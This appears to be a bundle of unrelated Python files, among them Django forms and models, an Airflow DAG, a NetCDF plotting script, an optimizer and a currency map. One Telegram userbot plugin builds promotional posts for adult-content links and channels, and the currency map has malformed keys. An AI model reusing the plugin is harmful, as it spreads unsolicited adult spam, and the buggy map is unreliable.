# If a moodle zip has been requested
if data.get('zip_for_moodle', False):
if not pcolumn or not ufname_column:
self.add_error(
None,
_('A Moodle ZIP requires two column names')
)
return data
# Participant columns must match the pattern 'Participant [0-9]+'
pcolumn_data = get_table_data(self.action.workflow.pk,
None,
column_names=[pcolumn])
if next((x for x in pcolumn_data
if not participant_re.search(str(x[0]))),
None):
self.add_error(
'participant_column',
_('Values in column must have format "Participant [number]"')
)
return data
class EmailExcludeForm(forms.Form):
# Email fields to exclude
exclude_values = forms.MultipleChoiceField([],
required=False,
label=_('Values to exclude'))
def __init__(self, data, *args, **kwargs):
self.action = kwargs.pop('action', None)
self.column_name = kwargs.pop('column_name', None)
self.exclude_init = kwargs.pop('exclude_values', list)
super(EmailExcludeForm, self).__init__(data, *args, **kwargs)
self.fields['exclude_values'].choices = \
get_table_cursor(self.action.workflow.pk,
self.action.get_filter(),
[self.column_name, self.column_name]).fetchall()
self.fields['exclude_values'].initial = self.exclude_init
class JSONActionForm(forms.Form):
# Column with unique key to review objects to consider
key_column = forms.ChoiceField(
label=_('Column to exclude objects to send (empty to skip step)'),
required=False
)
# Token to use when sending the JSON request
token = forms.CharField(
initial='',
label=_('Authentication Token'),
strip=True,
required=True,
help_text=_('Authentication token provided by the external platform.'),
widget=forms.Textarea(
attrs={
'rows': 1,
'cols': 120,
'placeholder': _('Authentication token to be sent with the '
'JSON object.')
}
)
)
def __init__(self, *args, **kargs):
self.column_names = kargs.pop('column_names')
self.op_payload = kargs.pop('op_payload')
super(JSONActionForm, self).__init__(*args, **kargs)
# Handle the key column setting the initial value if given and
# selecting the choices
key_column = self.op_payload.get('key_column', None)
if key_column is None:
key_column = ('', '---')
else:
key_column = (key_column, key_column)
self.fields['key_column'].initial = key_column
self.fields['key_column'].choices = [('', '---')] + \
[(x, x) for x in self.column_names]
self.fields['token'].initial = self.op_payload.get('token', '')
class ActionImportForm(forms.Form):
# Action name
name = forms.CharField(
max_length=512,
strip=True,
required=True,
label='Name')
file = RestrictedFileField(
max_upload_size=str(ontask_prefs.MAX_UPLOAD_SIZE),
content_types=json.loads(str(ontask_prefs.CONTENT_TYPES)),
allow_empty_file=False,
label=_('File'),
help_text=_('File containing a previously exported action'))
|
"""
Sample basic DAG which dbt runs a project
"""
import datetime as dt
from airflow import DAG
from airflow.utils.dates import days_ago
from airflow_dbt_python.dbt.operators import DbtRunOperator
with DAG(
dag_id="example_basic_dbt_run",
schedule_interval="0 * * * *",
start_date=days_ago(1),
catchup=False,
dagrun_timeout=dt.timedelta(minutes=60),
) as dag:
dbt_run = DbtRunOperator(
task_id="dbt_run_hourly",
project_dir="/path/to/my/dbt/project/",
profiles_dir="~/.dbt/",
models=["+tag:hourly"],
exclude=["tag:deprecated"],
target="production",
profile="my-project",
full_refresh=False,
)
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An IDS (Ideographic Description Sequence)."""
from typing import Callable, Optional, Text, List, cast
from src.utils import region as region_lib
LookupCb = Callable[[Text], Optional[Text]]
def _fast_is_cjk(x) -> bool:
"""Given a character ordinal, returns whether or not it is CJK."""
# Clauses, in order:
# (1) CJK Unified Ideographs
# (2) CJK Unified Ideographs Extension A
# (3) CJK Unified Ideographs Extension B
# (4) CJK Unified Ideographs Extension C
# (5) CJK Unified Ideographs Extension D
# (6) CJK Unified Ideographs Extension E
# (7) CJK Unified Ideographs Extension F
# (8) CJK Unified Ideographs Extension G
return (0x4E00 <= x <= 0x9FFF) or (0x3400 <= x <= 0x4DBF) or (
0x20000 <= x <= 0x2A5DF) or (0x2A700 <= x <= 0x2B73F) or (
0x2B740 <= x <= 0x2B81F) or (0x2B820 <= x <= 0x2CEAF) or (
0x2CEB0 <= x <= 0x2EBEF) or (0x30000 <= x <= 0x3134F)
class IdeographicSequence:
"""A character and IDS (Ideographic Description Sequence) decomposition.
Dumb container for a UnicodeText-typed ideographic description sequence, i.e.
想 => "⿱相心".
Also implements a not-dumb recursively_expand method which can transform:
想 => "⿱相心" => "⿱⿰木目心".
Attributes:
character: The character (u'你').
decomposition: The IDS ("⿰亻尔").
"""
def __init__(self,
character: Text,
decomposition: Optional[Text] = None,
lookup_cb: Optional[LookupCb] = None):
"""Inits a new Sequence.
Provide either a known decomposition or a cb.
Args:
character: The character.
decomposition: A known character decomposition.
lookup_cb: A lookup callback for decomposing characters. If this callback
fails, this method may raise a ValueError.
Raises:
ValueError: thrown if the |lookup_cb| fails to decompose |character|, or
thrown if neither a |decomposition| nor a |lookup_cb| is provided.
"""
self.character = character
if decomposition is not None:
self.decomposition = decomposition
elif lookup_cb is not None:
returned_decomposition = lookup_cb(character)
if returned_decomposition is None:
raise ValueError(f"No decomposition for {character}.")
self.decomposition = cast(Text, returned_decomposition)
else:
raise ValueError("No provided decomposition or callback.")
def _expand(self, decomposition: Text, lookup_cb: LookupCb):
"""Returns an expanded decomposition, using the lookup_cb.
Args:
decomposition: An already partially-decomposed character representation.
lookup_cb: A lookup callback which may fail.
Returns:
An expanded decomposition, or the same decomposition if no expansion is
possible.
"""
output = []
for c in decomposition:
if not _fast_is_cjk(ord(c)):
# Must be a verb, push this onto the stack as-is.
output.append(c)
continue
expanded = lookup_cb(c)
if expanded is None:
# No decomposition, push this character onto the stack as-is
output.append(c)
continue
elif expanded != c:
# If the character had an expansion, let's recurse before
# appending.
output.extend(self._expand(expanded, lookup_cb))
else:
# Otherwise the character can be pushed as-is.
output.append(c)
return "".join(output)
def recursively_expand(self, lookup_cb: LookupCb):
"""Given a lookup cb, expands this Sequence's decomposition in-place.
Args:
lookup_cb: A lookup callback which may fail.
"""
self.decomposition = self._expand(self.decomposition, lookup_cb)
class IdeographicSequenceGroup:
"""A holder class for a character and its default/alternative decompositions.
Attributes:
default_sequence: The default Sequence for this IdeographicSequenceGroup.
"""
def __init__(self, sequence: IdeographicSequence):
"""Instantiates a IdeographicSequenceGroup with a default for all regions.
Args:
sequence: A default IdeographicSequence.
"""
self.default_sequence = sequence
self._region_to_sequence_map = {}
def insert(self, regions: List[region_lib.Region],
alternative: IdeographicSequence):
"""Inserts an alternative sequence at each of a list of regions.
Args:
regions: A list of regions.
alternative: An alternative IDS.
Raises:
ValueError: if the alternative sequence doesn't represent the same
character as the default sequence.
"""
if alternative.character != self.default_sequence.character:
raise ValueError("Tried to insert a non-matching alternative IDS.")
for r in regions:
self._region_to_sequence_map[r] = alternative
def character(self):
"""Returns the character this IdeographicSequenceGroup represents."""
return self.default_sequence.character
def get_sequence_at_region(
self, input_region: region_lib.Region) -> IdeographicSequence:
"""Given a region, returns the corresponding sequence.
Args:
input_region: The input region.
Returns:
The corresponding sequence.
"""
if input_region in self._region_to_sequence_map:
return self._region_to_sequence_map[input_region]
return self.default_sequence
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
import komand
import json
class Component:
DESCRIPTION = "Retrieve a record"
class Input:
EXTERNAL_ID_FIELD_NAME = "external_id_field_name"
OBJECT_NAME = "object_name"
RECORD_ID = "record_id"
class Output:
RECORD = "record"
class GetRecordInput(komand.Input):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"external_id_field_name": {
"type": "string",
"title": "External ID Field Name",
"description": "The name of the external ID field that should be matched with record_id. If empty, the 'Id' field of the record is used",
"default": "",
"order": 2
},
"object_name": {
"type": "string",
"title": "Object Name",
"description": "The name of the object (e.g. 'Account')",
"default": "Account",
"order": 3
},
"record_id": {
"type": "string",
"title": "Record ID",
"description": "The ID of an existing record",
"order": 1
}
},
"required": [
"object_name",
"record_id"
]
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
class GetRecordOutput(komand.Output):
schema = json.loads("""
{
"type": "object",
"title": "Variables",
"properties": {
"record": {
"type": "object",
"title": "Record",
"description": "Matched record",
"order": 1
}
}
}
""")
def __init__(self):
super(self.__class__, self).__init__(self.schema)
|
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 26 15:38:12 2016
@author: raissaphilibert
"""
import datetime as dt # Python standard library datetime module
import numpy as np
from netCDF4 import Dataset # http://code.google.com/p/netcdf4-python/
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid
from netcdftime import utime
from datetime import datetime
from repel_labels import *
file = '/Users/raissaphilibert/Dropbox/oceanography_mac/nitrification/write-upsandpresentations/Paper_Benguela_nitrification/WSAfrica_MODIS_sst_20111129.nc4'
'''
NAME
NetCDF with Python
PURPOSE
To demonstrate how to read and write data with NetCDF files using
a NetCDF file from the NCEP/NCAR Reanalysis.
Plotting using Matplotlib and Basemap is also shown.
PROGRAMMER(S)
Chris Slocum
REVISION HISTORY
20140320 -- Initial version created and posted online
20140722 -- Added basic error handling to ncdump
Thanks to K.-Michael Aye for highlighting the issue
REFERENCES
netcdf4-python -- http://code.google.com/p/netcdf4-python/
NCEP/NCAR Reanalysis -- Kalnay et al. 1996
http://dx.doi.org/10.1175/1520-0477(1996)077<0437:TNYRP>2.0.CO;2
''''''
NAME
NetCDF with Python
PURPOSE
To demonstrate how to read and write data with NetCDF files using
a NetCDF file from the NCEP/NCAR Reanalysis.
Plotting using Matplotlib and Basemap is also shown.
PROGRAMMER(S)
Chris Slocum
REVISION HISTORY
20140320 -- Initial version created and posted online
20140722 -- Added basic error handling to ncdump
Thanks to K.-Michael Aye for highlighting the issue
REFERENCES
netcdf4-python -- http://code.google.com/p/netcdf4-python/
NCEP/NCAR Reanalysis -- Kalnay et al. 1996
http://dx.doi.org/10.1175/1520-0477(1996)077<0437:TNYRP>2.0.CO;2
'''
def ncdump(nc_fid, verb=True):
'''
ncdump outputs dimensions, variables and their attribute information.
The information is similar to that of NCAR's ncdump utility.
ncdump requires a valid instance of Dataset.
Parameters
----------
nc_fid : netCDF4.Dataset
A netCDF4 dateset object
verb : Boolean
whether or not nc_attrs, nc_dims, and nc_vars are printed
Returns
-------
nc_attrs : list
A Python list of the NetCDF file global attributes
nc_dims : list
A Python list of the NetCDF file dimensions
nc_vars : list
A Python list of the NetCDF file variables
'''
def print_ncattr(key):
"""
Prints the NetCDF file attributes for a given key
Parameters
----------
key : unicode
a valid netCDF4.Dataset.variables key
"""
try:
print "\t\ttype:", repr(nc_fid.variables[key].dtype)
for ncattr in nc_fid.variables[key].ncattrs():
print '\t\t%s:' % ncattr,\
repr(nc_fid.variables[key].getncattr(ncattr))
except KeyError:
print "\t\tWARNING: %s does not contain variable attributes" % key
# NetCDF global attributes
nc_attrs = nc_fid.ncattrs()
if verb:
print "NetCDF Global Attributes:"
for nc_attr in nc_attrs:
print '\t%s:' % nc_attr, repr(nc_fid.getncattr(nc_attr))
nc_dims = [dim for dim in nc_fid.dimensions] # list of nc dimensions
# Dimension shape information.
if verb:
print "NetCDF dimension information:"
for dim in nc_dims:
print "\tName:", dim
print "\t\tsize:", len(nc_fid.dimensions[dim])
print_ncattr(dim)
# Variable information.
nc_vars = [var for var in nc_fid.variables] # list of nc variables
if verb:
print "NetCDF variable information:"
for var in nc_vars:
if var not in nc_dims:
print '\tName:', var
print "\t\tdimensions:", nc_fid.variables[var].dimensions
print "\t\tsize:", nc_fid.variables[var].size
print_ncattr(var)
return nc_attrs, nc_dims, nc_vars
nc_f = file # Your filename
nc_fid = Dataset(nc_f, 'r') # Dataset is the class behavior to open the file
# and create an instance of the ncCDF4 class
nc_attrs, nc_dims, nc_vars = ncdump(nc_fid)
# Extract data from NetCDF file
lats = nc_fid.variables['lat'][:] # extract/copy the data
lons = nc_fid.variables['lon'][:]
time = nc_fid.variables['time'][:]
time_units= nc_fid.variables['time'].units
sst = nc_fid.variables['sst'][:] # shape is time, lat, lon as shown above
#lon, lat = np.meshgrid(lons, lats)
## HERER WILL TRY CALCULATE A CLIMATOLOGY
#mean_adt=[]
#for i in adt:
# time_idx = i
# adt_cyclic, lons_cyclic = addcyclic(adt[time_idx, :, :], lons)
## Create 2D lat/lon arrays for Basemap
# lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
## Transforms lat/lon into plotting coordinates for projection
# x, y = m(lon2d, lat2d)
# gridded[i]=(lon2d,lat2d,adt_cyclic)
#
#
###gets the unit of time from the netcdf file
cdftime = utime(time_units)
date1 = cdftime.num2date(time) # turns the times in date (2014,12,6,0,0)
date = [datet.date() for datet in date1]
date2 = [datet.toordinal() for datet in date]
##date I want YYYY,M,DAY
date_select = ((datetime(2011,11,29)).date()).toordinal()
time_idx =date2.index(date_select)
# Plot of global temperature on our random day
fig = plt.figure()
fig.subplots_adjust(left=0., right=1., bottom=0., top=0.9)
# Setup the map. See http://matplotlib.org/basemap/users/mapsetup.html
# for other projections.
# Make the plot continuous
m=Basemap(projection='cyl',llcrnrlon=13,llcrnrlat=-36,urcrnrlon=21.,urcrnrlat=-27.,
#lat_0=-35, lon_0=18,
resolution='l', area_thresh=1000.0)
m.drawcoastlines()
m.drawmapboundary()
adt_cyclic, lons_cyclic = addcyclic(sst[time_idx, :, :], lons)
# Shift the grid so lons go from -180 to 180 instead of 0 to 360.
#adt_cyclic, lons_cyclic = shiftgrid(180., adt_cyclic, lons_cyclic, start=False)
# Create 2D lat/lon arrays for Basemap
lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
# Transforms lat/lon into plotting coordinates for projection
x, y = m(lon2d, lat2d)
# Plot of air temperature with 11 contour intervals
cs = m.contourf(x, y, adt_cyclic, 11, cmap=plt.cm.viridis)
# plot the mean frontal positions
matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
#m.contour(x,y,adt_cyclic,[-1.244],colors='r',linewidth=1.3)# % Sbdy
#m.contour(x,y,adt_cyclic,[-0.943],colors='r',linewidth=1.3)#% SACCF_N
cbar = plt.colorbar(cs, orientation='horizontal', shrink=0.5)
cbar.set_label("%s (%s)" % (nc_fid.variables['sst'].standard_name,\
nc_fid.variables['sst'].units))
cur_time=(datetime.fromordinal((date_select)).date()).strftime('%m/%d/%Y')
m.drawcoastlines()
m.drawcountries()
m.fillcontinents(color='coral')
m.drawmapboundary()
parallels = np.arange(-36,-27,5.)
# labels = [left,right,top,bottom]
m.drawparallels(parallels,labels=[True,False,False,True])
meridians = np.arange(-180,180,5.)
m.drawmeridians(meridians,labels=[True,True,False,True])
plt.title("%s" % (cur_time))
#data_lat (samples lats)
data_lat=[-32]
data_lon=[18]
name =['Station']
x, y = m(data_lon, data_lat)
xy=zip(data_lon,data_lat)
m.scatter(x, y, marker='D',color='m')
#text(data_lon,data_lat,'Station')
fig.savefig('sst_sampple_pos.eps', bbox_inches='tight')
nc_fid.close() |
import asyncio
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP, StartTime, bot
from userbot.utils import bash, edit_or_reply, zelda_cmd
hpx_thumb = "https://telegra.ph/file/6c06e1d0a0183d0f4da06.jpg"
@zelda_cmd(pattern="hpx (.*)")
async def amireallycuan(cuan):
user = await bot.get_me()
reply_message = await cuan.get_reply_message()
capt = str(cuan.pattern_match.group(1).split(" ", 1)[1])
link = str(cuan.pattern_match.group(1).split(" ", 2)[0])
capti = capt.replace(".", " ")
thumb = hpx_thumb
output = (
f"✰ {capt}\n\n"
f"**LINK NOBAR** 🎞🔞\n"
f"{link}\n\n"
f"-----------------------------------\n"
f"📍**LIHAT LEBIH BANYAK :**\n"
"@asupanhypersex - @hyperseexx"
)
if thumb:
try:
logo = thumb
await cuan.delete()
msg = await bot.send_file(cuan.chat_id, logo, caption=output)
await asyncio.sleep(300)
except BaseException:
await cuan.edit(
output + "\n\n ***Tidak Ada Thumbnail!"
"\nHarap balas ke gambar untuk dijadikan thumbnail Content.**"
)
else:
await edit_or_reply(cuan, output)
CMD_HELP.update(
{
"content_hpx": f"**Plugin : **`Content CH`\
\n\n • **Syntax :** `{cmd}hpx` <Link> <Caption>\
\n • **Function : **Untuk membuat Content Pada Channel.\
"
}
)
|
import numpy as np
from xbbo.search_algorithm.base import AbstractOptimizer
from xbbo.configspace.space import DenseConfiguration, DenseConfigurationSpace
from . import alg_register
# from xbbo.configspace.feature_space import Uniform2Gaussian
from xbbo.search_algorithm.base import AbstractOptimizer
from xbbo.core.trials import Trial, Trials
@alg_register.register('cem')
class CEM(AbstractOptimizer):
def __init__(self,
space: DenseConfigurationSpace,
seed: int = 42,
llambda=30,
elite_ratio=0.3,
sample_method: str = 'Gaussian',
**kwargs):
AbstractOptimizer.__init__(self,
space,
encoding_cat='bin',
encoding_ord='bin',
seed=seed,
**kwargs)
# Uniform2Gaussian.__init__(self, )
# configs = self.space.get_hyperparameters()
self.dimension = self.space.get_dimensions()
self.bounds = self.space.get_bounds()
if sample_method == 'Gaussian':
self.sampler = Gaussian_sampler(self.dimension, self.bounds,
self.rng)
elif sample_method == 'Uniform':
self.sampler = Uniform_sampler(self.dimension, self.bounds,
self.rng)
self.buffer_x = []
self.buffer_y = []
self.llambda = llambda #if llambda else 4 + math.floor(3 * math.log(self.dimension))
self.elite_ratio = elite_ratio
self.elite_num = max(int(round(self.llambda * self.elite_ratio)), 2)
self.trials = Trials(space,dim=self.dimension)
def _suggest(self, n_suggestions=1):
trial_list = []
for n in range(n_suggestions):
# new_individual = self.feature_to_array(new_individual, )
new_individual = self.sampler.sample()
config = DenseConfiguration.from_array(self.space, new_individual)
trial_list.append(
Trial(config,
config_dict=config.get_dictionary(),
array=new_individual,
origin='CEM'))
return trial_list
def _get_elite(self):
self.buffer_x = np.asarray(self.buffer_x)
self.buffer_y = np.asarray(self.buffer_y)
idx = np.argsort(self.buffer_y)[:self.elite_num]
return self.buffer_x[idx, :], self.buffer_y[idx]
def _observe(self, trial_list):
for trial in trial_list:
self.trials.add_a_trial(trial, permit_duplicate=True)
self.buffer_x.append(trial.array)
self.buffer_y.append(trial.observe_value)
if len(self.buffer_x) < self.llambda:
return
elite_x, elite_y = self._get_elite()
self.sampler.update(elite_x, elite_y)
self.buffer_x = []
self.buffer_y = []
class Gaussian_sampler():
def __init__(self, dim, bounds, rng) -> None:
self.bounds = bounds
u = bounds.ub
l = bounds.lb
self.mean = (u + l) / 2
self.std = (u - l) / 6
self.dim = dim
self.rng = rng
def update(self, elite_x, elite_y):
self.mean = np.mean(elite_x, axis=0)
self.std = np.std(elite_x, axis=0)
def sample(self, ):
new_individual = self.rng.normal(self.mean, self.std + 1e-17)
new_individual = np.clip(new_individual, self.bounds.lb,
self.bounds.ub)
return new_individual
class Uniform_sampler():
def __init__(self, dim, bounds, rng) -> None:
self.bounds = bounds
u = bounds.ub
l = bounds.lb
self.min = np.copy(l)
self.max = np.copy(u)
self.dim = dim
self.rng = rng
def update(self, elite_x, elite_y):
self.min = np.amin(elite_x, axis=0)
self.max = np.amax(elite_x, axis=0)
def sample(self, ):
new_individual = self.rng.uniform(self.min, self.max)
new_individual = np.clip(new_individual, self.bounds.lb,
self.bounds.ub)
return new_individual
opt_class = CEM |
import uuid
from django.db import models
class BaseObject(models.Model):
class Meta:
abstract = True
uid = models.UUIDField(primary_key=True, editable=False, default=uuid.uuid4)
created_at = models.DateTimeField(auto_now_add=True, editable=False)
modified_at = models.DateTimeField(auto_now=True, editable=False)
class Player(BaseObject):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Game(BaseObject):
name = models.CharField(max_length=100)
players = models.ManyToManyField(Player, related_name="+", through="ScoreboardEntry")
def __str__(self):
return self.name
class ScoreboardEntry(BaseObject):
player = models.ForeignKey(Player, on_delete=models.CASCADE, related_name="scores")
game = models.ForeignKey(Game, on_delete=models.CASCADE, related_name="scores")
score = models.PositiveIntegerField()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from distutils.core import setup
setup(
name='django-timecode',
version='0.1.4',
description='Provides classes for working with timecodes (as used in the video industry).',
long_description=open('README.md').read(),
author='Joe Rickerby',
author_email='joerick@mac.com',
url='http://github.com/joerick/django-timecode/',
packages=[
'timecode',
'timecode.test',
],
license='LICENSE.txt',
install_requires=[
"Django >= 1.5",
]
)
|
import torch
import os
import urllib
from transformers import ( BertConfig, BertForSequenceClassification, BertTokenizer,
GPT2Config, GPT2LMHeadModel, GPT2Tokenizer)
class TabooBasicRuler:
def __init__(self):
# ppl ruler
config_class, model_class, tokenizer_class = GPT2Config, GPT2LMHeadModel, GPT2Tokenizer
config = config_class.from_pretrained("gpt2")
self.tokenizer = tokenizer_class.from_pretrained("gpt2", do_lower_case=True)
self.model = model_class.from_pretrained("gpt2", config=config)
# next sentence
_, model_class, tokenizer_class = BertConfig, BertForSequenceClassification, BertTokenizer
self.bert_tokenizer = tokenizer_class.from_pretrained("bert-base-uncased")
home_path = os.environ['HOME']
if not os.path.exists(os.path.join(home_path, ".taboo_ckp")):
os.makedirs(os.path.join(home_path, ".taboo_ckp"))
# config.json
url = 'https://thunlp.oss-cn-qingdao.aliyuncs.com/taboo/config.json'
urllib.request.urlretrieve(url, os.path.join(home_path, ".taboo_ckp", "config.json"))
# pytorch_model.bin
url = 'https://thunlp.oss-cn-qingdao.aliyuncs.com/taboo/pytorch_model.bin'
urllib.request.urlretrieve(url, os.path.join(home_path, ".taboo_ckp", "pytorch_model.bin"))
self.bert_model = model_class.from_pretrained(os.path.join(home_path, ".taboo_ckp"))
def check_relevance(self, sent, sentences):
last_sentence = sentences[-1]
block_size = 254
y1 = self.bert_tokenizer.tokenize(last_sentence)[:block_size]
y2 = self.bert_tokenizer.tokenize(sent)[:block_size]
y = ["[CLS]"] + y1 + ["[SEP]"] + y2 + ["[SEP]"]
y = self.bert_tokenizer.convert_tokens_to_ids(y)
types = [0] * (len(y1)+2) + [1] * (len(y2)+1)
atten = [1] * len(y)
pads = 512 - len(y)
y = y + [0] * pads
types = types + [0] * pads
atten = atten + [0] * pads
batch = [
torch.LongTensor([y]),
torch.LongTensor([atten]),
torch.LongTensor([types]),
torch.LongTensor([[0]])
]
with torch.no_grad():
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'token_type_ids': batch[2],
'labels': batch[3]}
outputs = self.bert_model(**inputs)
_, logits = outputs[:2]
if logits[0][0] < logits[0][1]:
return True
else:
return False
def check_available(self, sent):
tokens = self.tokenizer.convert_tokens_to_ids(self.tokenizer.tokenize(sent))
batch = torch.LongTensor([tokens])
with torch.no_grad():
outputs = self.model(batch, labels=batch)
lm_loss = outputs[0]
# ppl = torch.exp(lm_loss / len(tokens))
ppl = torch.exp(lm_loss).item()
if ppl < 50:
return True
else:
return False
|
from argparse import ArgumentParser
import pytest
from espnet2.bin.enh_asr_train import get_parser
from espnet2.bin.enh_asr_train import main
def test_get_parser():
assert isinstance(get_parser(), ArgumentParser)
def test_main():
with pytest.raises(SystemExit):
main()
|
import types
from sqlalchemy import Column, String, BigInteger, Integer, DateTime, ForeignKey, Sequence, Table
import datetime
from models.BaseModel import BaseModel
#from models.FacilitiesRelated.RoomModel import RoomModel
# EventRoomModel = Table('events_rooms', BaseModel.metadata,
# Column('id', BigInteger, Sequence('all_id_seq'), primary_key=True),
# Column('room_id', ForeignKey('rooms.id'), primary_key=True),
# Column('event_id', ForeignKey('events.id'), primary_key=True)
# )
class EventRoomModel(BaseModel):
__tablename__ = 'events_rooms'
id = Column(BigInteger, Sequence('all_id_seq'), primary_key=True)
room_id = Column(ForeignKey('rooms.id'), primary_key=True)
event_id = Column(ForeignKey('events.id'), primary_key=True)
|
class Currency:
def __init__(self, code: str):
self.__code = code
def __repr__(self):
return self.retrieve_symbol()
@property
def code(self):
return self.__code
def retrieve_symbol(self):
return self._currency_codes(self.code)
@staticmethod
def _currency_codes(code: str = None):
codes = {"AED": u"\u062f"+ u"\u002e" + u"\u0625", "AFN": u"\u060B", "ALL": u"\u004C" + u"\u0065" + u"\u006B",
"AMD": u"\u058F", "ANG": "Netherlands Antilles Guilder", "AOA": "Angola Kwanza",
"ARS": "Argentina Peso", "AUD": "Australia Dollar", "AWG": "Aruba Guilder",
"AZN": "Azerbaijan New Manat", "BAM": "Bosnia and Herzegovina Convertible Marka",
"BBD": "Barbados Dollar", "BDT": "Bangladesh Taka", "BGN": "Bulgaria Lev", "BHD": "Bahrain Dinar",
"BIF": "Burundi Franc", "BMD": "Bermuda Dollar", "BND": "Brunei Darussalam Dollar",
"BOB": "Bolivia Bolíviano", "BRL": "Brazil Real", "BSD": "Bahamas Dollar",
"BTN": "Bhutan Ngultrum", "BWP": "Botswana Pula", "BYR": "Belarus Ruble", "BZD": "Belize Dollar",
"CAD": "Canada Dollar", "CDF": "Congo/Kinshasa Franc", "CHF": "Switzerland Franc",
"CLP": "Chile Peso", "CNY": "China Yuan Renminbi", "COP": "Colombia Peso",
"CRC": "Costa Rica Colon", "CUC": "Cuba Convertible Peso", "CUP": "Cuba Peso",
"CVE": "Cape Verde Escudo", "CZK": "Czech Republic Koruna", "DJF": "Djibouti Franc",
"DKK": "Denmark Krone", "DOP": "Dominican Republic Peso", "DZD": "Algeria Dinar",
"EGP": "Egypt Pound", "ERN": "Eritrea Nakfa", "ETB": "Ethiopia Birr",
"EUR": u"\u20ac", "FJD": "Fiji Dollar", "FKP": "Falkland Islands (Malvinas) Pound",
"GBP": u"\u00A3", "GEL": "Georgia Lari", "GGP": "Guernsey Pound",
"GHS": "Ghana Cedi", "GIP": "Gibraltar Pound", "GMD": "Gambia Dalasi", "GNF": "Guinea Franc",
"GTQ": "Guatemala Quetzal", "GYD": "Guyana Dollar", "HKD": "Hong Kong Dollar",
"HNL": "Honduras Lempira", "HRK": "Croatia Kuna", "HTG": "Haiti Gourde", "HUF": "Hungary Forint",
"IDR": "Indonesia Rupiah", "ILS": "Israel Shekel", "IMP": "Isle of Man Pound",
"INR": "India Rupee", "IQD": "Iraq Dinar", "IRR": "Iran Rial", "ISK": "Iceland Krona",
"JEP": "Jersey Pound", "JMD": "Jamaica Dollar", "JOD": "Jordan Dinar", "JPY": "Japan Yen",
"KES": "Kenya Shilling", "KGS": "Kyrgyzstan Som", "KHR": "Cambodia Riel", "KMF": "Comoros Franc",
"KPW": "Korea (North) Won", "KRW": "Korea (South) Won", "KWD": "Kuwait Dinar",
"KYD": "Cayman Islands Dollar", "KZT": "Kazakhstan Tenge", "LAK:": "Laos Kip",
"LBP": "Lebanon Pound", "LKR": "Sri Lanka Rupee", "LRD": "Liberia Dollar", "LSL": "Lesotho Loti",
"LYD": "Libya Dinar", "MAD": "Morocco Dirham", "MDL": "Moldova Leu", "MGA": "Madagascar Ariary",
"MKD": "Macedonia Denar", "MMK": "Myanmar (Burma) Kyat", "MNT": "Mongolia Tughrik",
"MOP": "Macau Pataca", "MRO": "Mauritania Ouguiya", "MUR": "Mauritius Rupee",
"MVR": "Maldives (Maldive Islands) Rufiyaa", "MWK": "Malawi Kwacha", "MXN": "Mexico Peso",
"MYR": "Malaysia Ringgit", "MZN": "Mozambique Metical", "NAD": "Namibia Dollar",
"NGN": "Nigeria Naira", "NIO": "Nicaragua Cordoba", "NOK:": "Norway Krone", "NPR": "Nepal Rupee",
"NZD": "New Zealand Dollar", "OMR": "Oman Rial", "PAB": "Panama Balboa", "PEN": "Peru Sol",
"PGK": "Papua New Guinea Kina", "PHP": "Philippines Peso", "PKR": "Pakistan Rupee",
"PLN": "Poland Zloty", "PYG": "Paraguay Guarani", "QAR": "Qatar Riyal", "RON": "Romania New Leu",
"RSD": "Serbia Dinar", "RUB": "Russia Ruble", "RWF": "Rwanda Franc", "SAR": "Saudi Arabia Riyal",
"SBD": "Solomon Islands Dollar", "SCR": "Seychelles Rupee", "SDG": "Sudan Pound",
"SEK": "Sweden Krona", "SGD": "Singapore Dollar", "SHP": "Saint Helena Pound",
"SLL": "Sierra Leone Leone", "SOS": "Somalia Shilling", "SPL:": "Seborga Luigino",
"SR:D": "Suriname Dollar", "STD": "São Tomé and Príncipe Dobra", "SVC": "El Salvador Colon",
"SYP": "Syria Pound", "SZL": "Swaziland Lilangeni", "THB": "Thailand Baht",
"TJS": "Tajikistan Somoni", "TMT": "Turkmenistan Manat", "TND": "Tunisia Dinar",
"TOP": "Tonga Pa'anga", "TRY": "Turkey Lira", "TTD": "Trinidad and Tobago Dollar",
"TVD": "Tuvalu Dollar", "TWD": "Taiwan New Dollar", "TZS": "Tanzania Shilling",
"UAH": "Ukraine Hryvnia", "UGX": "Uganda Shilling", "USD": u"\u0024",
"UYU": "Uruguay Peso", "UZS": "Uzbekistan Som", "VEF": "Venezuela Bolivar",
"VND": "Viet Nam Dong", "VUV": "Vanuatu Vatu", "WST": "Samoa Tala",
"XAF": "Communauté Financière Africaine (BEAC) CFA Franc BEAC", "XCD": "East Caribbean Dollar",
"XDR": "International Monetary Fund (IMF) Special Drawing Rights",
"XOF": "Communauté Financière Africaine (BCEAO) Franc",
"XPF": "Comptoirs Français du Pacifique (CFP) Franc", "YER": "Yemen Rial",
"ZAR": "South Africa Rand", "ZMW": "Zambia Kwacha", "ZWD": "Zimbabwe Dollar"}
symbol = codes.get(code)
return symbol
|
"""Add on-delete to FKs.
Revision ID: 5ba9cd4297ea
Revises: d8fa81723cf3
Create Date: 2021-11-03 14:28:43.001481
"""
from alembic import op
# revision identifiers, used by Alembic.
revision = "5ba9cd4297ea"
down_revision = "d8fa81723cf3"
branch_labels = None
depends_on = None
def upgrade():
op.drop_constraint("posts_rss_feed_id_fkey", "posts", type_="foreignkey")
op.create_foreign_key(
"posts_rss_feed_id_fkey",
"posts",
"rss_feeds",
["rss_feed_id"],
["id"],
ondelete="CASCADE",
)
op.drop_constraint("rss_feeds_category_id_fkey", "rss_feeds",
type_='foreignkey')
